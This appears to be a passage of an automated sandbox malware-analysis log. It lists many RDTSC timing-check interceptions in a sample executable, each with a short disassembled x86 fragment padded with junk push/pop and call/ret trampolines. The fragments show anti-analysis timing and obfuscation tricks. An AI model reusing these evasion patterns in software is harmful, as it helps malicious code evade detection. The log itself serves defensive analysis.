Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7928C second address: C7930E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a jbe 00007FD13CB4AEFCh 0x00000010 jnp 00007FD13CB4AEF6h 0x00000016 pop eax 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FD13CB4AEF8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 add dword ptr [ebp+129C22ECh], esi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007FD13CB4AEF8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 adc di, CEDDh 0x00000059 push 00000000h 0x0000005b mov dword ptr [ebp+12B4222Ah], ebx 0x00000061 push eax 0x00000062 pushad 0x00000063 je 00007FD13CB4AEF8h 0x00000069 push eax 0x0000006a pop eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jo 00007FD13CB4AEF6h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7930E second address: C79312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7AD94 second address: C7AD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD13CB4AEF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7CDCB second address: C7CDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD13D063724h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7CDEA second address: C7CE56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, 93E0h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FD13CB4AEF8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push edx 0x0000002b movzx esi, cx 0x0000002e pop esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FD13CB4AEF8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov esi, ebx 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jo 00007FD13CB4AEF6h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7CE56 second address: C7CE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7CE5A second address: C7CE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7CE60 second address: C7CE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7D724 second address: C7D737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD13CB4AEF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FD13CB4AEF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7FC03 second address: C7FC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7FC08 second address: C7FC27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FD13CB4AEF8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7EAC5 second address: C7EACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD13D063716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C80C8B second address: C80C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C81B93 second address: C81B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C80DD5 second address: C80DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C80DDC second address: C80DE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C81E37 second address: C81E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C83E80 second address: C83EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D063726h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C83EA3 second address: C83EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C85C56 second address: C85C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C84E1A second address: C84E20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C85C62 second address: C85C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C84E20 second address: C84E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C86AED second address: C86AF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C86AF7 second address: C86B71 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e ja 00007FD13CB4AEF8h 0x00000014 mov ebx, edx 0x00000016 sub ebx, 67535166h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FD13CB4AEF8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 add edi, dword ptr [ebp+129C2981h] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FD13CB4AEF8h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a mov bx, 44F2h 0x0000005e xchg eax, esi 0x0000005f jl 00007FD13CB4AF10h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C88B4C second address: C88B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD13D063716h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d je 00007FD13D063729h 0x00000013 pushad 0x00000014 jmp 00007FD13D06371Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8BAA4 second address: C8BB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD13CB4AEF8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 sub ebx, dword ptr [ebp+129C1C9Ch] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FD13CB4AEF8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 push 00000000h 0x00000048 mov ebx, esi 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8BB05 second address: C8BB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C88D22 second address: C88D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C89CA3 second address: C89CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8ADCD second address: C8ADE5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13CB4AEFCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C87DBC second address: C87DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8BB09 second address: C8BB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8ADE5 second address: C8ADE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C87DC0 second address: C87DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD13CB4AF07h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C87DE2 second address: C87DF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C89D55 second address: C89D68 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD13CB4AEF8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8E9C2 second address: C8E9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8DA96 second address: C8DA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8E9C6 second address: C8EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FD13D06371Ch 0x00000011 nop 0x00000012 sub dword ptr [ebp+129C1C54h], edx 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+129C29A9h] 0x00000020 sub dword ptr [ebp+129C2660h], ecx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FD13D063718h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 mov ebx, dword ptr [ebp+12B3707Bh] 0x00000048 xchg eax, esi 0x00000049 push ebx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8EC47 second address: C8EC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8EC4D second address: C8EC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C93673 second address: C9368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FD13CB4AF04h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C9368E second address: C936A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FD13D063716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C936A2 second address: C936A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98BAB second address: C98BC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FD13D063716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD13D06371Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98BC6 second address: C98BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD13CB4AEF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C38078 second address: C3808B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD13D063716h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3808B second address: C38090 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C38090 second address: C38096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C984BA second address: C984C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C984C6 second address: C984CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98761 second address: C98765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98765 second address: C9877D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D06371Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C9877D second address: C98781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98781 second address: C98785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98785 second address: C9878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2EF0 second address: CA2EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2EF8 second address: CA2F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13CB4AF06h 0x00000008 jmp 00007FD13CB4AF09h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2F2C second address: CA2F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD13D06371Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2F40 second address: CA2F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22A3 second address: CA22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD13D063716h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22B0 second address: CA22B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22B5 second address: CA22BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA23FD second address: CA2407 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD13CB4AEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2407 second address: CA240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2586 second address: CA25A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF08h 0x00000009 je 00007FD13CB4AEF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA25A8 second address: CA25BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FD13D063722h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA25BA second address: CA25D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD13CB4AEF6h 0x0000000a jmp 00007FD13CB4AF00h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2737 second address: CA273C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA273C second address: CA2742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2742 second address: CA2761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FD13D06371Dh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2761 second address: CA2765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2765 second address: CA2773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD13D063716h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28AC second address: CA28B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28B2 second address: CA28D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD13D063716h 0x0000000a jmp 00007FD13D06371Eh 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28D8 second address: CA28F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FD13CB4AEFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2D74 second address: CA2D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765B5 second address: C765E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007FD13CB4AEFCh 0x00000010 jg 00007FD13CB4AEF6h 0x00000016 lea eax, dword ptr [ebp+12B68362h] 0x0000001c clc 0x0000001d nop 0x0000001e jnc 00007FD13CB4AEFEh 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765E7 second address: C765EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765EB second address: C765F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765F9 second address: C765FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
